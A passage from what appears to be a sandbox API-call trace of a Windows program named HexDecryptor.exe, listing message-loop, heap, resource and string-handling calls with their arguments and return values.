(hWnd=0x202e6) returned 1 [0270.308] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.308] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.308] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.309] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.309] IsWindowUnicode (hWnd=0x202e6) returned 1 [0270.309] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.309] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.309] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.309] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.310] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.310] WaitMessage () returned 1 [0270.329] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.330] GetMessageA (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.330] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.330] DispatchMessageA (lpMsg=0x11fed00) returned 0x0 [0270.330] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.330] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.330] WaitMessage () returned 1 [0270.536] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.536] IsWindowUnicode (hWnd=0x102ea) returned 1 [0270.537] GetMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x11fed00) returned 1 [0270.537] TranslateMessage (lpMsg=0x11fed00) returned 0 [0270.537] DispatchMessageW (lpMsg=0x11fed00) returned 0x0 [0270.537] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.537] PeekMessageW (in: lpMsg=0x11fed00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x11fed00) returned 0 [0270.537] WaitMessage () Thread: id = 38 os_tid = 0xd64 Thread: id = 43 os_tid = 0x868 Thread: id = 44 os_tid = 0x564 [0124.597] CoGetContextToken (in: pToken=0x539f714 | out: pToken=0x539f714) returned 0x800401f0 [0124.597] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0124.598] RoInitialize () returned 0x1 [0124.598] RoUninitialize () returned 0x0 Thread: id = 55 os_tid = 0x13b0 Thread: id = 56 os_tid = 0x13c0 Thread: id = 59 os_tid = 0x1394 Thread: id = 60 os_tid = 0xcdc Process: id = "11" image_name = "hexdecryptor.exe" filename = "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe" page_root = "0x1fdc8000" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "HexDecryptor.exe " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 39 os_tid = 0xd44 [0119.919] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.937] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2200000 [0119.953] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x23e0000 [0119.954] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e05a8 [0119.954] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x10) returned 0x23e05c0 [0119.954] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x38) returned 0x22005a8 [0119.954] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x40) returned 0x22005e8 [0119.954] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x890000 [0119.955] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x10) returned 0x2200630 [0119.955] RtlReAllocateHeap (Heap=0x2200000, Flags=0x8, Ptr=0x2200630, Size=0x10) returned 0x2200630 [0119.955] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x38) returned 0x2200648 [0119.955] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x10) returned 0x2200688 [0119.955] InitCommonControlsEx (picce=0x19ff74) returned 1 [0119.958] CoInitialize (pvReserved=0x0) returned 0x0 [0120.202] wcslen (_String="*") returned 0x1 [0120.202] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e05d8 [0120.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x9c [0120.202] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x3c) returned 0x22006a0 [0120.203] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0x800) returned 0x22006e8 [0120.203] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0120.203] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0120.203] InitOnceExecuteOnce (in: InitOnce=0x41867c, InitFn=0x40e043, Parameter=0x40e002, Context=0x19ff24 | out: InitOnce=0x41867c, Parameter=0x40e002, Context=0x19ff24*=0x4) returned 1 [0120.203] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.203] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x18) returned 0x2200ef0 [0120.203] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x38) returned 0x2200f10 [0120.203] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x8, Size=0xc) returned 0x2200f50 [0120.203] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x34) returned 0x2200f68 [0120.203] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0120.204] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0120.204] InitOnceExecuteOnce (in: InitOnce=0x41867c, InitFn=0x40e043, Parameter=0x40e002, Context=0x19ff2c | out: InitOnce=0x41867c, Parameter=0x40e002, Context=0x19ff2c*=0x4) returned 1 [0120.204] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.204] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x18) returned 0x2200fa8 [0120.204] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x38) returned 0x2200fc8 [0120.204] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x34) returned 0x2201008 [0120.204] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0120.204] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0120.204] InitOnceExecuteOnce (in: InitOnce=0x41867c, InitFn=0x40e043, Parameter=0x40e002, Context=0x19ff2c | out: InitOnce=0x41867c, Parameter=0x40e002, Context=0x19ff2c*=0x4) returned 1 [0120.204] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.204] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x124fa4) returned 0x2077020 [0120.223] wcslen (_String="\\") returned 0x1 [0120.223] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e05f0 [0120.223] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x34) returned 0x2201048 [0120.223] LoadLibraryW (lpLibFileName="Kernel32.dll") returned 0x772d0000 [0120.223] GetProcAddress (hModule=0x772d0000, lpProcName="InitOnceExecuteOnce") returned 0x74cb5550 [0120.223] InitOnceExecuteOnce (in: InitOnce=0x41867c, InitFn=0x40e043, Parameter=0x40e002, Context=0x19ff2c | out: InitOnce=0x41867c, Parameter=0x40e002, Context=0x19ff2c*=0x4) returned 1 [0120.223] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.223] SetConsoleCtrlHandler (HandlerRoutine=0x4020ce, Add=1) returned 1 [0120.223] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x409f10) returned 0x0 [0120.224] GetLastError () returned 0x0 [0120.224] SetLastError (dwErrCode=0x0) [0120.224] GetLastError () returned 0x0 [0120.224] SetLastError (dwErrCode=0x0) [0120.224] GetLastError () returned 0x0 [0120.224] SetLastError (dwErrCode=0x0) [0120.224] GetLastError () returned 0x0 [0120.224] SetLastError (dwErrCode=0x0) [0120.224] GetLastError () returned 0x0 [0120.224] SetLastError (dwErrCode=0x0) [0120.224] GetLastError () returned 0x0 [0120.224] SetLastError (dwErrCode=0x0) [0120.224] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x2201088 [0120.225] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0x404a) returned 0x23e0608 [0120.225] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x2201088 | out: hHeap=0x2200000) returned 1 [0120.225] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e4660 [0120.225] GetLastError () returned 0x0 [0120.225] SetLastError (dwErrCode=0x0) [0120.225] GetLastError () returned 0x0 [0120.225] SetLastError (dwErrCode=0x0) [0120.225] GetLastError () returned 0x0 [0120.225] SetLastError (dwErrCode=0x0) [0120.225] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x23e0608, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0x28 [0120.226] wcscmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", _String2="\\\\?\\") returned -1 [0120.226] LoadLibraryExW (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", hFile=0x0, dwFlags=0x2) returned 0x400000 [0120.226] GetLastError () returned 0x0 [0120.226] SetLastError (dwErrCode=0x0) [0120.226] EnumResourceTypesW (hModule=0x400000, lpEnumFunc=0x402033, lParam=0x0) returned 1 [0120.226] EnumResourceNamesW (hModule=0x400000, lpType=0xa, lpEnumFunc=0x402e03, lParam=0x0) returned 1 [0120.227] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x118) returned 0x2201088 [0120.227] GetLastError () returned 0x0 [0120.227] SetLastError (dwErrCode=0x0) [0120.227] GetLastError () returned 0x0 [0120.227] SetLastError (dwErrCode=0x0) [0120.227] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e46b8 [0120.227] GetLastError () returned 0x0 [0120.227] SetLastError (dwErrCode=0x0) [0120.227] GetLastError () returned 0x0 [0120.227] SetLastError (dwErrCode=0x0) [0120.227] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e4720 [0120.227] GetLastError () returned 0x0 [0120.227] SetLastError (dwErrCode=0x0) [0120.227] GetLastError () returned 0x0 [0120.228] SetLastError (dwErrCode=0x0) [0120.228] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x1e) returned 0x23e4778 [0120.228] GetLastError () returned 0x0 [0120.228] SetLastError (dwErrCode=0x0) [0120.228] GetLastError () returned 0x0 [0120.228] SetLastError (dwErrCode=0x0) [0120.228] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e47a0 [0120.228] FreeLibrary (hLibModule=0x400000) returned 1 [0120.228] GetLastError () returned 0x0 [0120.228] SetLastError (dwErrCode=0x0) [0120.228] wcslen (_String="1DFA639AC78C5C50E13DE5B5BB0D314B3BB75167") returned 0x28 [0120.228] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e47f8 [0120.228] GetLastError () returned 0x0 [0120.229] SetLastError (dwErrCode=0x0) [0120.229] wcslen (_String="1DFA639AC78C5C50E13DE5B5BB0D314B3BB75167") returned 0x28 [0120.229] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x5a) returned 0x23e4860 [0120.229] GetLastError () returned 0x0 [0120.229] SetLastError (dwErrCode=0x0) [0120.229] wcslen (_String="507F43385DDDE7C4FA4D672FE1359C71") returned 0x20 [0120.229] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e47f8, Size=0x4a) returned 0x23e47f8 [0120.229] GetLastError () returned 0x0 [0120.229] SetLastError (dwErrCode=0x0) [0120.229] wcslen (_String="1DFA639AC78C5C50E13DE5B5BB0D314B3BB75167") returned 0x28 [0120.229] wcslen (_String="507F43385DDDE7C4FA4D672FE1359C71") returned 0x20 [0120.229] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4860, Size=0x9a) returned 0x23e4860 [0120.229] GetLastError () returned 0x0 [0120.229] SetLastError (dwErrCode=0x0) [0120.229] wcslen (_String="CA450EA8EC") returned 0xa [0120.229] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e47f8, Size=0x1e) returned 0x23e47f8 [0120.229] GetLastError () returned 0x0 [0120.229] SetLastError (dwErrCode=0x0) [0120.229] wcslen (_String="CA450EA8EC") returned 0xa [0120.229] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x1e) returned 0x23e4820 [0120.230] GetLastError () returned 0x0 [0120.230] SetLastError (dwErrCode=0x0) [0120.230] wcslen (_String="EBA7866A99CCAECAA170E46C3E4F0F2C") returned 0x20 [0120.230] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e47f8, Size=0x4a) returned 0x23e4908 [0120.230] GetLastError () returned 0x0 [0120.230] SetLastError (dwErrCode=0x0) [0120.230] wcslen (_String="1DFA639AC78C5C50E13DE5B5BB0D314B3BB75167507F43385DDDE7C4FA4D672FE1359C71") returned 0x48 [0120.230] wcslen (_String="EBA7866A99CCAECAA170E46C3E4F0F2C") returned 0x20 [0120.230] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4860, Size=0xda) returned 0x23e4960 [0120.230] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e46b8 | out: hHeap=0x23e0000) returned 1 [0120.230] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e4720 | out: hHeap=0x23e0000) returned 1 [0120.230] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e4778 | out: hHeap=0x23e0000) returned 1 [0120.230] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e47a0 | out: hHeap=0x23e0000) returned 1 [0120.230] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x2201088 | out: hHeap=0x2200000) returned 1 [0120.230] GetLastError () returned 0x0 [0120.230] SetLastError (dwErrCode=0x0) [0120.230] GetLastError () returned 0x0 [0120.230] SetLastError (dwErrCode=0x0) [0120.230] GetLastError () returned 0x0 [0120.231] SetLastError (dwErrCode=0x0) [0120.231] GetLastError () returned 0x0 [0120.231] SetLastError (dwErrCode=0x0) [0120.231] GetLastError () returned 0x0 [0120.231] SetLastError (dwErrCode=0x0) [0120.231] GetLastError () returned 0x0 [0120.231] SetLastError (dwErrCode=0x0) [0120.231] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x2201088 [0120.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2F0F4E3C64E071AACEACC99A6687ABE17C9531EF276D4AF4C7EDDD58334F70576157BB3B413D0BB5B5ED31E05C5C87CA936AFD1", cchWideChar=105, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0120.231] malloc (_Size=0x6a) returned 0x8c26c0 [0120.231] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2F0F4E3C64E071AACEACC99A6687ABE17C9531EF276D4AF4C7EDDD58334F70576157BB3B413D0BB5B5ED31E05C5C87CA936AFD1", cchWideChar=105, lpMultiByteStr=0x8c26c0, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2F0F4E3C64E071AACEACC99A6687ABE17C9531EF276D4AF4C7EDDD58334F70576157BB3B413D0BB5B5ED31E05C5C87CA936AFD1", lpUsedDefaultChar=0x0) returned 105 [0120.231] free (_Block=0x8c26c0) [0120.231] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x2201088 | out: hHeap=0x2200000) returned 1 [0120.231] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e4848 [0120.231] GetLastError () returned 0x0 [0120.231] SetLastError (dwErrCode=0x0) [0120.231] wcslen (_String="1FF5A6C5D6C3BC38A0D81FF49C27D3F4") returned 0x20 [0120.231] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0x4a) returned 0x23e48a0 [0120.232] GetLastError () returned 0x0 [0120.232] SetLastError (dwErrCode=0x0) [0120.232] GetLastError () returned 0x0 [0120.232] SetLastError (dwErrCode=0x0) [0120.232] GetLastError () returned 0x0 [0120.232] SetLastError (dwErrCode=0x0) [0120.232] GetLastError () returned 0x0 [0120.232] SetLastError (dwErrCode=0x0) [0120.232] RtlAllocateHeap (HeapHandle=0x2200000, Flags=0x0, Size=0x9c) returned 0x2201088 [0120.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1FF5A6C5D6C3BC38A0D81FF49C27D3F4", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0120.232] malloc (_Size=0x22) returned 0x8c26c0 [0120.232] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1FF5A6C5D6C3BC38A0D81FF49C27D3F4", cchWideChar=33, lpMultiByteStr=0x8c26c0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1FF5A6C5D6C3BC38A0D81FF49C27D3F4", lpUsedDefaultChar=0x0) returned 33 [0120.232] free (_Block=0x8c26c0) [0120.232] HeapFree (in: hHeap=0x2200000, dwFlags=0x0, lpMem=0x2201088 | out: hHeap=0x2200000) returned 1 [0120.232] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4848, Size=0x4a) returned 0x23e4848 [0120.232] GetLastError () returned 0x0 [0120.232] SetLastError (dwErrCode=0x0) [0120.232] GetLastError () returned 0x0 [0120.232] SetLastError (dwErrCode=0x0) [0120.233] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e4848, Size=0x1e) returned 0x23e4848 [0120.233] GetCommandLineW () returned="HexDecryptor.exe " [0120.233] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e4908 | out: hHeap=0x23e0000) returned 1 [0120.233] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e4820 | out: hHeap=0x23e0000) returned 1 [0120.233] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e4960 | out: hHeap=0x23e0000) returned 1 [0120.233] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e48a0 | out: hHeap=0x23e0000) returned 1 [0120.233] HeapFree (in: hHeap=0x23e0000, dwFlags=0x0, lpMem=0x23e4848 | out: hHeap=0x23e0000) returned 1 [0120.233] GetLastError () returned 0x0 [0120.233] SetLastError (dwErrCode=0x0) [0120.233] GetLastError () returned 0x0 [0120.233] SetLastError (dwErrCode=0x0) [0120.233] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e05c0 [0120.233] GetLastError () returned 0x0 [0120.233] SetLastError (dwErrCode=0x0) [0120.233] wcslen (_String="S") returned 0x1 [0120.233] RtlAllocateHeap (HeapHandle=0x23e0000, Flags=0x0, Size=0xc) returned 0x23e46b8 [0120.233] GetLastError () returned 0x0 [0120.233] SetLastError (dwErrCode=0x0) [0120.233] GetLastError () returned 0x0 [0120.233] SetLastError (dwErrCode=0x0) [0120.243] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.243] GetLastError () returned 0x0 [0120.243] SetLastError (dwErrCode=0x0) [0120.243] wcslen (_String="S") returned 0x1 [0120.243] wcslen (_String="e") returned 0x1 [0120.243] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0xe) returned 0x23e46b8 [0120.243] GetLastError () returned 0x0 [0120.243] SetLastError (dwErrCode=0x0) [0120.243] GetLastError () returned 0x0 [0120.243] SetLastError (dwErrCode=0x0) [0120.244] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.244] GetLastError () returned 0x0 [0120.244] SetLastError (dwErrCode=0x0) [0120.244] wcslen (_String="Se") returned 0x2 [0120.244] wcslen (_String="l") returned 0x1 [0120.244] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x10) returned 0x23e46b8 [0120.244] GetLastError () returned 0x0 [0120.244] SetLastError (dwErrCode=0x0) [0120.244] GetLastError () returned 0x0 [0120.244] SetLastError (dwErrCode=0x0) [0120.244] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.244] GetLastError () returned 0x0 [0120.244] SetLastError (dwErrCode=0x0) [0120.244] wcslen (_String="Sel") returned 0x3 [0120.244] wcslen (_String="e") returned 0x1 [0120.244] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x12) returned 0x23e46b8 [0120.244] GetLastError () returned 0x0 [0120.244] SetLastError (dwErrCode=0x0) [0120.244] GetLastError () returned 0x0 [0120.244] SetLastError (dwErrCode=0x0) [0120.245] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.245] GetLastError () returned 0x0 [0120.245] SetLastError (dwErrCode=0x0) [0120.245] wcslen (_String="Sele") returned 0x4 [0120.245] wcslen (_String="c") returned 0x1 [0120.245] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x14) returned 0x23e46b8 [0120.245] GetLastError () returned 0x0 [0120.245] SetLastError (dwErrCode=0x0) [0120.245] GetLastError () returned 0x0 [0120.245] SetLastError (dwErrCode=0x0) [0120.245] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.245] GetLastError () returned 0x0 [0120.245] SetLastError (dwErrCode=0x0) [0120.245] wcslen (_String="Selec") returned 0x5 [0120.245] wcslen (_String="t") returned 0x1 [0120.245] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x16) returned 0x23e46b8 [0120.245] GetLastError () returned 0x0 [0120.245] SetLastError (dwErrCode=0x0) [0120.245] GetLastError () returned 0x0 [0120.245] SetLastError (dwErrCode=0x0) [0120.246] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.246] GetLastError () returned 0x0 [0120.246] SetLastError (dwErrCode=0x0) [0120.246] wcslen (_String="Select") returned 0x6 [0120.246] wcslen (_String=" ") returned 0x1 [0120.246] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x18) returned 0x23e46b8 [0120.246] GetLastError () returned 0x0 [0120.246] SetLastError (dwErrCode=0x0) [0120.246] GetLastError () returned 0x0 [0120.246] SetLastError (dwErrCode=0x0) [0120.246] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.246] GetLastError () returned 0x0 [0120.246] SetLastError (dwErrCode=0x0) [0120.246] wcslen (_String="Select ") returned 0x7 [0120.246] wcslen (_String="t") returned 0x1 [0120.247] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x1a) returned 0x23e46b8 [0120.247] GetLastError () returned 0x0 [0120.247] SetLastError (dwErrCode=0x0) [0120.247] GetLastError () returned 0x0 [0120.247] SetLastError (dwErrCode=0x0) [0120.247] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.247] GetLastError () returned 0x0 [0120.247] SetLastError (dwErrCode=0x0) [0120.247] wcslen (_String="Select t") returned 0x8 [0120.247] wcslen (_String="h") returned 0x1 [0120.247] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x1c) returned 0x23e46b8 [0120.247] GetLastError () returned 0x0 [0120.247] SetLastError (dwErrCode=0x0) [0120.247] GetLastError () returned 0x0 [0120.247] SetLastError (dwErrCode=0x0) [0120.247] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.247] GetLastError () returned 0x0 [0120.247] SetLastError (dwErrCode=0x0) [0120.247] wcslen (_String="Select th") returned 0x9 [0120.247] wcslen (_String="e") returned 0x1 [0120.247] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x1e) returned 0x23e46b8 [0120.248] GetLastError () returned 0x0 [0120.248] SetLastError (dwErrCode=0x0) [0120.248] GetLastError () returned 0x0 [0120.248] SetLastError (dwErrCode=0x0) [0120.248] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.248] GetLastError () returned 0x0 [0120.248] SetLastError (dwErrCode=0x0) [0120.248] wcslen (_String="Select the") returned 0xa [0120.248] wcslen (_String=" ") returned 0x1 [0120.248] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x20) returned 0x23e46b8 [0120.248] GetLastError () returned 0x0 [0120.248] SetLastError (dwErrCode=0x0) [0120.248] GetLastError () returned 0x0 [0120.248] SetLastError (dwErrCode=0x0) [0120.248] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.248] GetLastError () returned 0x0 [0120.248] SetLastError (dwErrCode=0x0) [0120.248] wcslen (_String="Select the ") returned 0xb [0120.248] wcslen (_String="e") returned 0x1 [0120.248] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x22) returned 0x23e46b8 [0120.248] GetLastError () returned 0x0 [0120.249] SetLastError (dwErrCode=0x0) [0120.249] GetLastError () returned 0x0 [0120.249] SetLastError (dwErrCode=0x0) [0120.249] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 [0120.249] GetLastError () returned 0x0 [0120.249] SetLastError (dwErrCode=0x0) [0120.249] wcslen (_String="Select the e") returned 0xc [0120.249] wcslen (_String="x") returned 0x1 [0120.249] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e46b8, Size=0x24) returned 0x23e46b8 [0120.249] GetLastError () returned 0x0 [0120.249] SetLastError (dwErrCode=0x0) [0120.249] GetLastError () returned 0x0 [0120.249] SetLastError (dwErrCode=0x0) [0120.249] RtlReAllocateHeap (Heap=0x23e0000, Flags=0x0, Ptr=0x23e05c0, Size=0xc) returned 0x23e05c0 